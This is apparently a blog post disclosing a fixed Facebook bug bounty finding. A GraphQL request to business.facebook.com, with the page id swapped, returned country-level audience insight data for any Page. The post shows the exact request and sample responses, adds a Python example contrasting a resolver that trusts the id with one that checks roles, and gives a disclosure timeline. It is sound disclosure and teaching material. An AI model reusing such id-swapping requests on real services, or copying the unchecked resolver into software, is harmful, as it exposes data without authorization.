Wednesday, April 7, 2021

Facebook Bug POC - Fetching Demographic Audience data Insight for any Page

There was a GraphQL request that could be modified to return the demographic audience insight data for any Facebook Page.

The demographic audience insight in question is the Country likes insight (the one specific to this bug).

Example: 20% (or xxxx in absolute numbers) of the Page's audience is from a specific country.

The request went to -

POST /api/graphql/
Host: business.facebook.com

variables={"input":{"breakdowns":["COUNTRY"],"event":"LIKE","id":"(TARGET_PAGE_ID)","time_range":{"type":"LIFETIME"},"tofu_metric":"PERCENT"}}&doc_id=2678024672210272

After replacing TARGET_PAGE_ID with the target Page's ID, the response would look like -

{"data":{"tofu_metrics_query":{"status":"SUCCESS","__typename":"TofuSingleValueWithBreakdownMetricsQueryResult","breakdowns":["COUNTRY"],"bucket_values":[{"bucket_names":["India"],"bucket_value":42.6},{"bucket_names":["Pakistan"],"bucket_value":8.1},{"bucket_names":["Bangladesh"],"bucket_value":4.8},{"bucket_names":["Sri Lanka"],"bucket_value":4.7},{"bucket_names":["Egypt"],"bucket_value":2.8

Changing the "tofu_metric" value from "PERCENT" to "UNIQUE_USERS" in the original request returns numbers instead of percentages. The response looks like -

"bucket_names":["India"],"bucket_value":1473},{"bucket_names":["Pakistan"],"bucket_value":281},{"bucket_names":["Bangladesh"],"bucket_value":165},{"bucket_names":["Sri Lanka"],"bucket_value":164},{"bucket_names":["Egypt"],"bucket_value":98},{"bucket_names":["Nepal"],"bucket_value":93
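
The request above works for any Page because the server acts on the client-supplied "id" without checking the caller's relationship to that Page. As an added example (not part of the original post and not Facebook's code), the Python below puts a resolver that trusts the id beside one that authorizes the viewer against the requested Page first. The function names, role names, the "ERROR" status and the sample data are all assumptions made for illustration; only the field names "id", "tofu_metric", "bucket_names" and "bucket_value" come from the request and response shown here.

```python
# Added example: hypothetical names and constructed data throughout.
from dataclasses import dataclass

# Constructed sample store: page id -> unique likers per country.
PAGE_LIKES = {
    "1001": {"India": 1473, "Pakistan": 281, "Bangladesh": 165},
    "2002": {"Egypt": 98, "Nepal": 93},
}
# Constructed role table: (viewer id, page id) -> role on that page.
PAGE_ROLES = {("alice", "1001"): "ADMIN", ("bob", "2002"): "ANALYST"}
INSIGHT_ROLES = {"ADMIN", "ANALYST"}  # assumed roles allowed to read insights
METRICS = ("PERCENT", "UNIQUE_USERS")  # the two values seen in the write-up


@dataclass
class MetricsInput:
    id: str           # client-supplied page id
    tofu_metric: str  # "PERCENT" or "UNIQUE_USERS"


def _buckets(inp):
    """Build the COUNTRY breakdown in the shape of the response above."""
    counts = PAGE_LIKES.get(inp.id, {})
    total = sum(counts.values()) or 1
    if inp.tofu_metric == "PERCENT":
        return [{"bucket_names": [c], "bucket_value": round(100 * n / total, 1)}
                for c, n in counts.items()]
    return [{"bucket_names": [c], "bucket_value": n} for c, n in counts.items()]


def resolve_unchecked(viewer, inp):
    """Flawed pattern: being logged in is treated as enough for any page id."""
    return {"status": "SUCCESS", "bucket_values": _buckets(inp)}


def resolve_checked(viewer, inp):
    """Hardened pattern: authorize the viewer for this page before reading."""
    if inp.tofu_metric not in METRICS:
        return {"status": "ERROR", "bucket_values": []}
    # Unknown page and missing role return the same error, so the
    # response does not reveal which page ids exist.
    if PAGE_ROLES.get((viewer, inp.id)) not in INSIGHT_ROLES:
        return {"status": "ERROR", "bucket_values": []}
    return {"status": "SUCCESS", "bucket_values": _buckets(inp)}
```
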

Timeline -

20 October 2020  - Reported the issue.
3 November 2020  - Triaged.
9 December 2020  - Fixed, and I confirmed the fix.
11 December 2020 - Rewarded.